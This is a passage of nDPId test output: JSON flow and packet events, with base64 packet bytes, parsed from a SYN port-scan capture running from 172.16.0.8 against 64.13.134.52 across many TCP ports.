-00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":32,"source":"synscan.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057478,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"synscan.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1278275057478,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057478,"pkt":"ACYLMQczACWzv5HuCABFAAAsDXoAAC0GDfmsEAAIQA2GNIzTAbvdU4MZAAAAAGACCAAu0QAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":33,"source":"synscan.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057677,"flow_last_seen":1278275057677,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057677,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1723,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"synscan.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1278275057677,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057677,"pkt":"ACYLMQczACWzv5HuCABFAAAsaUIAACsGtDCsEAAIQA2GNIzSBrvdUoMYAAAAAGACEAAh1AAAAgQFtA=="} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":34,"source":"synscan.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057677,"flow_last_seen":1278275057677,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057677,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":993,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"synscan.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1278275057677,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057677,"pkt":"ACYLMQczACWzv5HuCABFAAAsvHwAADMGWPasEAAIQA2GNIzSA+HdUoMYAAAAAGACEAAkrgAAAgQFtA=="} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":35,"source":"synscan.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057677,"flow_last_seen":1278275057677,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057677,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":110,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"synscan.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1278275057677,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057677,"pkt":"ACYLMQczACWzv5HuCABFAAAsMtIAACsG6qCsEAAIQA2GNIzSAG7dUoMYAAAAAGACEAAoIQAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":36,"source":"synscan.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057677,"flow_last_seen":1278275057677,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057677,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"synscan.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1278275057677,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057677,"pkt":"ACYLMQczACWzv5HuCABFAAAsXl8AAC8GuxOsEAAIQA2GNIzSH5DdUoMYAAAAAGACEAAI\/wAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":37,"source":"synscan.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057677,"flow_last_seen":1278275057677,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057677,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"synscan.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1278275057677,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057677,"pkt":"ACYLMQczACWzv5HuCABFAAAsGxAAACsGAmOsEAAIQA2GNIzSBrjdUoMYAAAAAGACEAAh1wAAAgQFtA=="} -00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":38,"source":"synscan.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057678,"flow_last_seen":1278275057678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057678,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":25,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"synscan.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1278275057678,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057678,"pkt":"ACYLMQczACWzv5HuCABFAAAsWWoAACoGxQisEAAIQA2GNIzSABndUoMYAAAAAGACDAAsdgAAAgQFtA=="} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":39,"source":"synscan.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057678,"flow_last_seen":1278275057678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057678,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"synscan.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1278275057678,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057678,"pkt":"ACYLMQczACWzv5HuCABFAAAs03wAADEGQ\/asEAAIQA2GNIzSAb3dUoMYAAAAAGACCAAu0gAAAgQFtA=="} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":40,"source":"synscan.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057678,"flow_last_seen":1278275057678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057678,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":256,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"synscan.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1278275057678,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057678,"pkt":"ACYLMQczACWzv5HuCABFAAAsszkAADEGZDmsEAAIQA2GNIzSAQDdUoMYAAAAAGACCAAvjwAAAgQFtA=="} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":41,"source":"synscan.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057678,"flow_last_seen":1278275057678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057678,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":554,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"synscan.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1278275057678,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057678,"pkt":"ACYLMQczACWzv5HuCABFAAAsKoIAACkG9PCsEAAIQA2GNIzSAirdUoMYAAAAAGACCAAuZQAAAgQFtA=="} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":42,"source":"synscan.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057678,"flow_last_seen":1278275057678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057678,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":135,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"synscan.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1278275057678,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057678,"pkt":"ACYLMQczACWzv5HuCABFAAAsVR8AACsGyFOsEAAIQA2GNIzSAIfdUoMYAAAAAGACEAAoCAAAAgQFtA=="} -00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":43,"source":"synscan.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057678,"flow_last_seen":1278275057678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057678,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":22,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"synscan.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1278275057678,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057678,"pkt":"ACYLMQczACWzv5HuCABFAAAs1DEAADAGREGsEAAIQA2GNIzSABbdUoMYAAAAAGACBAA0eQAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":44,"source":"synscan.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057678,"flow_last_seen":1278275057678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057678,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8888,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"synscan.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1278275057678,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057678,"pkt":"ACYLMQczACWzv5HuCABFAAAs1H4AADMGQPSsEAAIQA2GNIzSIrjdUoMYAAAAAGACEAAF1wAAAgQFtA=="} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":45,"source":"synscan.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057678,"flow_last_seen":1278275057678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057678,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":548,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"synscan.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1278275057678,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057678,"pkt":"ACYLMQczACWzv5HuCABFAAAs0TgAACYGUTqsEAAIQA2GNIzSAiTdUoMYAAAAAGACDAAqawAAAgQFtA=="} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"synscan.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1278275057740,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1278275057740,"pkt":"ACWzv5HuACYLMQczCABFAAAsAABAADYG0nJADYY0rBAACAAWjNIpZyOl3VKDGWASFtDU2wAAAgQFZAAA"} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"synscan.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1278275057740,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1278275057740,"pkt":"ACWzv5HuACYLMQczCABFAAAoAABAADYG0nZADYY0rBAACAAZjNIefGtp3VKDGVAUAADGOQAAAAAAAAAA"} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":48,"source":"synscan.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057742,"flow_last_seen":1278275057742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057742,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1056,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"synscan.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1278275057742,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057742,"pkt":"ACYLMQczACWzv5HuCABFAAAseeEAACgGppGsEAAIQA2GNIzSBCDdUoMYAAAAAGACBAAwbwAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":49,"source":"synscan.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057742,"flow_last_seen":1278275057742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057742,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10629,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"synscan.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1278275057742,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057742,"pkt":"ACYLMQczACWzv5HuCABFAAAsRVMAACsG2B+sEAAIQA2GNIzSKYXdUoMYAAAAAGACEAD\/CQAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":50,"source":"synscan.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057742,"flow_last_seen":1278275057742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057742,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2605,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"synscan.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1278275057742,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057742,"pkt":"ACYLMQczACWzv5HuCABFAAAsRm4AADAG0gSsEAAIQA2GNIzSCi3dUoMYAAAAAGACBAAqYgAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":51,"source":"synscan.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057742,"flow_last_seen":1278275057742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057742,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10621,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"synscan.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1278275057742,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057742,"pkt":"ACYLMQczACWzv5HuCABFAAAsnToAADAGezisEAAIQA2GNIzSKX3dUoMYAAAAAGACBAALEgAAAgQFtA=="} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":52,"source":"synscan.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057742,"flow_last_seen":1278275057742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057742,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":990,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":52,"source":"synscan.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1278275057742,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057742,"pkt":"ACYLMQczACWzv5HuCABFAAAskEcAADcGgSusEAAIQA2GNIzSA97dUoMYAAAAAGACEAAksQAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":53,"source":"synscan.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057742,"flow_last_seen":1278275057742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057742,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5414,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"synscan.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1278275057742,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057742,"pkt":"ACYLMQczACWzv5HuCABFAAAs0R4AADcGQFSsEAAIQA2GNIzSFSbdUoMYAAAAAGACEAATaQAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":54,"source":"synscan.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057743,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"synscan.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1278275057743,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057743,"pkt":"ACYLMQczACWzv5HuCABFAAAsbqYAACwGrcysEAAIQA2GNIzSCK7dUoMYAAAAAGACBAAr4QAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":55,"source":"synscan.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057743,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"synscan.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1278275057743,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057743,"pkt":"ACYLMQczACWzv5HuCABFAAAsJyoAADQG7UisEAAIQA2GNIzSF3DdUoMYAAAAAGACBAAdHwAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":56,"source":"synscan.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057743,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1687,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"synscan.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1278275057743,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057743,"pkt":"ACYLMQczACWzv5HuCABFAAAsfqQAACwGnc6sEAAIQA2GNIzSBpfdUoMYAAAAAGACBAAt+AAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":57,"source":"synscan.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057743,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1233,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"synscan.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1278275057743,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057743,"pkt":"ACYLMQczACWzv5HuCABFAAAskxYAACsGilysEAAIQA2GNIzSBNHdUoMYAAAAAGACEAAjvgAAAgQFtA=="} 